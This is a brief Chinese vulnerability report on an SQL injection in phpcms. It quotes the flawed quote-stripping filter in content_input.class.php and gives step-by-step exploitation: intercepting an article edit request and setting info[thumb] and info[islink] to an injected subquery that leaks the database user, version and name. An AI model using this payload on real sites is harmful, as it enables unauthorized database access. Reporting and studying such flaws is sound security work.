phpcms最新版本SQL注入一枚

漏洞作者: 路人甲

漏洞文件

/caches/caches_model/caches_data/content_input.class.php

[php]

function image($field, $value) {

$value = remove_xss(str_replace(array("'",'"','(',')'),'',$value));

return trim($value);

}

[/php]

过滤不单引号,由于GPC的关系,因此会留下 \ ,造成注入

漏洞利用证明:

开启投稿

1.首先随便提交一个文章,保存 点编辑,如图

011624255058d14b9dfa1b2c062128478ffc7aaf

 

2.进入编辑后,直接点击保存 ,然后抓包修改如下

0116245028a83257355db304ba8e23af1ca3957e

修改info[thumb]为:http://site'

修改info[islink]为:

,description=(select concat(user(),0x7c,version(),0x7c,database())) -- s

最后确认。

再次进入编辑页面,可以看见注入的结果,如图:

01162530337ac6cfded468a378de48446c62606b

发表评论